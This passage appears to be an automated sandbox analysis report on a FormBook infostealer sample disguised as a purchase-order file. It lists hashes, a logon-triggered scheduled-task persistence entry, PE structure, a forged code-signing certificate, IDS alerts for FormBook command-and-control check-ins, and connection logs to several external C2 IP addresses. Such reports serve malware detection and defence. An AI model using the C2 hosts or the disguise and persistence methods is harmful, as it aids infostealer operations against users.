                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtacxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTJv
                                                                                                            MD5:174DBEDA5B2271DBBE12F71A9CB62DF1
                                                                                                            SHA1:D56C8AF265AB47310804508BE51B3F8D333BBD44
                                                                                                            SHA-256:D989663B3E8C79586FD87B935DBD5831DA3D00A9B3BAFAB47C3FD77702AA2A84
                                                                                                            SHA-512:70CE9245DA8D453F5E77C36AD7DB958FE5F180594E943843EBA9F3DB20C1448D8457E1C539A7C53DFB476AD850C21D75F7FF639CDAFF55033C6BBD634CA300F5
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                            Process:C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1001992
                                                                                                            Entropy (8bit):7.826886814961456
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:I1CYeyNf9/bClxa1ymQOTwzQhakpr6h1NhMue8DgO:7Yeyh+nO1xwshanRMP8DV
                                                                                                            MD5:574C0E8C1D426321E95BD8476334F271
                                                                                                            SHA1:0B43D8C96BBECE4A501991AD1A0761A4710176C5
                                                                                                            SHA-256:7E1C2D14EBC29AE8D1434D9D18D6054A16E91385051D7BB9ED183A63FAFA66B8
                                                                                                            SHA-512:95A57D7B2180EF137295961105F970BEAB46E1BDA6B6ABC134B452FE1CC63F8C14C6775F2A31933C8BB8F7E3D60C409BD64F670C5C5F863E4C9CB47F2498656B
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 55%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....wFg..............0......,........... ... ....@.. ....................................@.....................................O.... ...(...............6...`..........T............................................ ............... ..H............text........ ...................... ..`.rsrc....(... ...*..................@..@.reloc.......`......................@..B........................H.......tC..HO...............T...........................................0............}......}.....s!...}......}......}.....("......(......{...........%.r...p(#...s$....%.r...p(#...s$....%.r!..p(#...s$........M...%.+...(%...s$...(&...ra..p ............%...%...o'....*&..(.....*&..(.....*..0..h..........{....o(....+...()...t.......o........(*...-...........o.......(.......}.....{....o+.....{.....o,....*........#1.......0............2..2...8.....s...... ....o-..... ....o......%o
                                                                                                            Process:C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:true
                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):7.826886814961456
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:Pre Alert PO TVKJEANSA00967.bat.exe
                                                                                                            File size:1'001'992 bytes
                                                                                                            MD5:574c0e8c1d426321e95bd8476334f271
                                                                                                            SHA1:0b43d8c96bbece4a501991ad1a0761a4710176c5
                                                                                                            SHA256:7e1c2d14ebc29ae8d1434d9d18d6054a16e91385051d7bb9ed183a63fafa66b8
                                                                                                            SHA512:95a57d7b2180ef137295961105f970beab46e1bda6b6abc134b452fe1cc63f8c14c6775f2a31933c8bb8f7e3d60c409bd64f670c5c5f863e4c9cb47f2498656b
                                                                                                            SSDEEP:24576:I1CYeyNf9/bClxa1ymQOTwzQhakpr6h1NhMue8DgO:7Yeyh+nO1xwshanRMP8DV
                                                                                                            TLSH:A92512E4134AC503E1D26B7009B1E7BA3B791EC9B811C327D7ECFCEB3896315A559262
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....wFg..............0......,........... ... ....@.. ....................................@................................
                                                                                                            Icon Hash:1b79c89ef671c7e5
                                                                                                            Entrypoint:0x4f04e2
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:true
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x67467711 [Wed Nov 27 01:34:09 2024 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                            Signature Valid:false
                                                                                                            Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                            Error Number:-2146869232
                                                                                                            Not Before, Not After
                                                                                                            • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                                                            Subject Chain
                                                                                                            • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                            Version:3
                                                                                                            Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                            Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                            Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                            Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
                                                                                                            push ebx
                                                                                                            add byte ptr [ecx+00h], bh
                                                                                                            jnc 00007F6298B3E342h
                                                                                                            je 00007F6298B3E342h
                                                                                                            add byte ptr [ebp+00h], ch
                                                                                                            add byte ptr [ecx+00h], al
                                                                                                            arpl word ptr [eax], ax
                                                                                                            je 00007F6298B3E342h
                                                                                                            imul eax, dword ptr [eax], 00610076h
                                                                                                            je 00007F6298B3E342h
                                                                                                            outsd
                                                                                                            add byte ptr [edx+00h], dh
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xf048d0x4f.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xf20000x28fc.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xf14000x3608
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xf60000xc.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xee78c0x54.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x20000xee5080xee600a11a73d8ff8d7f192f70ac3513bd0dbaFalse0.9329188106318825data7.830225763539746IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rsrc0xf20000x28fc0x2a00addd1b43db278810783e1e5a3bd54c9dFalse0.8694196428571429data7.47655297874276IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .reloc0xf60000xc0x200c323e1d9573eea8a4b5a74d8937d0b0eFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_ICON0xf21000x2227PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9723207137138282
                                                                                                            RT_GROUP_ICON0xf43380x14data1.05
                                                                                                            RT_VERSION0xf435c0x3a0data0.41810344827586204
                                                                                                            RT_MANIFEST0xf470c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                            DLLImport
                                                                                                            mscoree.dll_CorExeMain
                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-11-27T16:43:19.387146+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44974315.197.142.17380TCP
                                                                                                            2024-11-27T16:43:19.387146+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44974315.197.142.17380TCP
                                                                                                            2024-11-27T16:43:36.752491+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976838.6.78.23580TCP
                                                                                                            2024-11-27T16:43:39.370503+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44977538.6.78.23580TCP
                                                                                                            2024-11-27T16:43:42.095834+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44978138.6.78.23580TCP
                                                                                                            2024-11-27T16:43:44.696864+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44978738.6.78.23580TCP
                                                                                                            2024-11-27T16:43:44.696864+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44978738.6.78.23580TCP
                                                                                                            2024-11-27T16:43:51.963011+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449803139.162.181.7680TCP
                                                                                                            2024-11-27T16:43:54.656200+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449810139.162.181.7680TCP
                                                                                                            2024-11-27T16:43:57.614795+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449817139.162.181.7680TCP
                                                                                                            2024-11-27T16:44:00.225216+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449826139.162.181.7680TCP
                                                                                                            2024-11-27T16:44:00.225216+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449826139.162.181.7680TCP
                                                                                                            2024-11-27T16:44:07.849372+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449841154.23.176.19780TCP
                                                                                                            2024-11-27T16:44:10.536744+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449847154.23.176.19780TCP
                                                                                                            2024-11-27T16:44:13.209788+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449853154.23.176.19780TCP
                                                                                                            2024-11-27T16:44:16.039080+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449860154.23.176.19780TCP
                                                                                                            2024-11-27T16:44:16.039080+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449860154.23.176.19780TCP
                                                                                                            2024-11-27T16:44:23.316350+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449878194.58.112.17480TCP
                                                                                                            2024-11-27T16:44:25.958240+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449884194.58.112.17480TCP
                                                                                                            2024-11-27T16:44:28.724138+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449891194.58.112.17480TCP
                                                                                                            2024-11-27T16:44:31.286011+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449898194.58.112.17480TCP
                                                                                                            2024-11-27T16:44:31.286011+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449898194.58.112.17480TCP
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 27, 2024 16:43:18.106259108 CET4974380192.168.2.415.197.142.173
                                                                                                            Nov 27, 2024 16:43:18.227502108 CET804974315.197.142.173192.168.2.4
                                                                                                            Nov 27, 2024 16:43:18.227772951 CET4974380192.168.2.415.197.142.173
                                                                                                            Nov 27, 2024 16:43:18.238176107 CET4974380192.168.2.415.197.142.173
                                                                                                            Nov 27, 2024 16:43:18.358134031 CET804974315.197.142.173192.168.2.4
                                                                                                            Nov 27, 2024 16:43:19.386939049 CET804974315.197.142.173192.168.2.4
                                                                                                            Nov 27, 2024 16:43:19.386967897 CET804974315.197.142.173192.168.2.4
                                                                                                            Nov 27, 2024 16:43:19.387145996 CET4974380192.168.2.415.197.142.173
                                                                                                            Nov 27, 2024 16:43:19.390312910 CET4974380192.168.2.415.197.142.173
                                                                                                            Nov 27, 2024 16:43:19.510260105 CET804974315.197.142.173192.168.2.4
                                                                                                            Nov 27, 2024 16:43:35.256982088 CET4976880192.168.2.438.6.78.235
                                                                                                            Nov 27, 2024 16:43:35.376974106 CET804976838.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:35.377140045 CET4976880192.168.2.438.6.78.235
                                                                                                            Nov 27, 2024 16:43:35.393528938 CET4976880192.168.2.438.6.78.235
                                                                                                            Nov 27, 2024 16:43:35.513562918 CET804976838.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:36.752314091 CET804976838.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:36.752420902 CET804976838.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:36.752490997 CET4976880192.168.2.438.6.78.235
                                                                                                            Nov 27, 2024 16:43:36.896361113 CET4976880192.168.2.438.6.78.235
                                                                                                            Nov 27, 2024 16:43:37.915625095 CET4977580192.168.2.438.6.78.235
                                                                                                            Nov 27, 2024 16:43:38.035681009 CET804977538.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:38.035778999 CET4977580192.168.2.438.6.78.235
                                                                                                            Nov 27, 2024 16:43:38.051320076 CET4977580192.168.2.438.6.78.235
                                                                                                            Nov 27, 2024 16:43:38.171397924 CET804977538.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:39.370203018 CET804977538.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:39.370435953 CET804977538.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:39.370502949 CET4977580192.168.2.438.6.78.235
                                                                                                            Nov 27, 2024 16:43:39.552556038 CET4977580192.168.2.438.6.78.235
                                                                                                            Nov 27, 2024 16:43:40.571584940 CET4978180192.168.2.438.6.78.235
                                                                                                            Nov 27, 2024 16:43:40.691556931 CET804978138.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:40.691684961 CET4978180192.168.2.438.6.78.235
                                                                                                            Nov 27, 2024 16:43:40.707643032 CET4978180192.168.2.438.6.78.235
                                                                                                            Nov 27, 2024 16:43:40.827999115 CET804978138.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:40.828012943 CET804978138.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:40.828115940 CET804978138.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:40.828130007 CET804978138.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:40.828234911 CET804978138.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:40.828243971 CET804978138.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:40.828397036 CET804978138.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:40.828406096 CET804978138.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:40.828414917 CET804978138.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:42.095628977 CET804978138.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:42.095645905 CET804978138.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:42.095834017 CET4978180192.168.2.438.6.78.235
                                                                                                            Nov 27, 2024 16:43:42.210777044 CET4978180192.168.2.438.6.78.235
                                                                                                            Nov 27, 2024 16:43:43.228883982 CET4978780192.168.2.438.6.78.235
                                                                                                            Nov 27, 2024 16:43:43.349100113 CET804978738.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:43.349205017 CET4978780192.168.2.438.6.78.235
                                                                                                            Nov 27, 2024 16:43:43.359163046 CET4978780192.168.2.438.6.78.235
                                                                                                            Nov 27, 2024 16:43:43.479151011 CET804978738.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:44.696460009 CET804978738.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:44.696774006 CET804978738.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:44.696863890 CET4978780192.168.2.438.6.78.235
                                                                                                            Nov 27, 2024 16:43:44.699795008 CET4978780192.168.2.438.6.78.235
                                                                                                            Nov 27, 2024 16:43:44.819981098 CET804978738.6.78.235192.168.2.4
                                                                                                            Nov 27, 2024 16:43:50.498317003 CET4980380192.168.2.4139.162.181.76
                                                                                                            Nov 27, 2024 16:43:50.618345976 CET8049803139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:43:50.618493080 CET4980380192.168.2.4139.162.181.76
                                                                                                            Nov 27, 2024 16:43:50.644484043 CET4980380192.168.2.4139.162.181.76
                                                                                                            Nov 27, 2024 16:43:50.764834881 CET8049803139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:43:51.962773085 CET8049803139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:43:51.962913990 CET8049803139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:43:51.963011026 CET4980380192.168.2.4139.162.181.76
                                                                                                            Nov 27, 2024 16:43:52.146276951 CET4980380192.168.2.4139.162.181.76
                                                                                                            Nov 27, 2024 16:43:53.184994936 CET4981080192.168.2.4139.162.181.76
                                                                                                            Nov 27, 2024 16:43:53.305064917 CET8049810139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:43:53.305157900 CET4981080192.168.2.4139.162.181.76
                                                                                                            Nov 27, 2024 16:43:53.325275898 CET4981080192.168.2.4139.162.181.76
                                                                                                            Nov 27, 2024 16:43:53.445257902 CET8049810139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:43:54.656110048 CET8049810139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:43:54.656131983 CET8049810139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:43:54.656199932 CET4981080192.168.2.4139.162.181.76
                                                                                                            Nov 27, 2024 16:43:54.833659887 CET4981080192.168.2.4139.162.181.76
                                                                                                            Nov 27, 2024 16:43:56.134743929 CET4981780192.168.2.4139.162.181.76
                                                                                                            Nov 27, 2024 16:43:56.254878044 CET8049817139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:43:56.255012035 CET4981780192.168.2.4139.162.181.76
                                                                                                            Nov 27, 2024 16:43:56.270591021 CET4981780192.168.2.4139.162.181.76
                                                                                                            Nov 27, 2024 16:43:56.390840054 CET8049817139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:43:56.390995979 CET8049817139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:43:56.391010046 CET8049817139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:43:56.391036034 CET8049817139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:43:56.391077042 CET8049817139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:43:56.391123056 CET8049817139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:43:56.391160965 CET8049817139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:43:56.391249895 CET8049817139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:43:56.391339064 CET8049817139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:43:57.571856976 CET8049817139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:43:57.614794970 CET4981780192.168.2.4139.162.181.76
                                                                                                            Nov 27, 2024 16:43:57.663481951 CET8049817139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:43:57.663631916 CET4981780192.168.2.4139.162.181.76
                                                                                                            Nov 27, 2024 16:43:57.786788940 CET4981780192.168.2.4139.162.181.76
                                                                                                            Nov 27, 2024 16:43:58.828490019 CET4982680192.168.2.4139.162.181.76
                                                                                                            Nov 27, 2024 16:43:58.949927092 CET8049826139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:43:58.950021982 CET4982680192.168.2.4139.162.181.76
                                                                                                            Nov 27, 2024 16:43:58.960870981 CET4982680192.168.2.4139.162.181.76
                                                                                                            Nov 27, 2024 16:43:59.080867052 CET8049826139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:44:00.224970102 CET8049826139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:44:00.225033045 CET8049826139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:44:00.225045919 CET8049826139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:44:00.225215912 CET4982680192.168.2.4139.162.181.76
                                                                                                            Nov 27, 2024 16:44:00.228317022 CET4982680192.168.2.4139.162.181.76
                                                                                                            Nov 27, 2024 16:44:00.348635912 CET8049826139.162.181.76192.168.2.4
                                                                                                            Nov 27, 2024 16:44:06.205841064 CET4984180192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:06.331506968 CET8049841154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:06.331710100 CET4984180192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:06.346745014 CET4984180192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:06.466855049 CET8049841154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:07.849371910 CET4984180192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:07.968125105 CET8049841154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:07.968146086 CET8049841154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:07.968245029 CET4984180192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:07.968403101 CET4984180192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:07.969779015 CET8049841154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:07.969839096 CET4984180192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:08.883502960 CET4984780192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:09.006347895 CET8049847154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:09.006517887 CET4984780192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:09.022443056 CET4984780192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:09.142997980 CET8049847154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:10.536744118 CET4984780192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:10.657433033 CET8049847154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:10.657493114 CET4984780192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:11.555684090 CET4985380192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:11.676819086 CET8049853154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:11.677561998 CET4985380192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:11.692883968 CET4985380192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:11.813209057 CET8049853154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:11.813250065 CET8049853154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:11.813302040 CET8049853154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:11.813329935 CET8049853154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:11.813363075 CET8049853154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:11.813431025 CET8049853154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:11.813529015 CET8049853154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:11.813558102 CET8049853154.23.176.197192.168.2.4
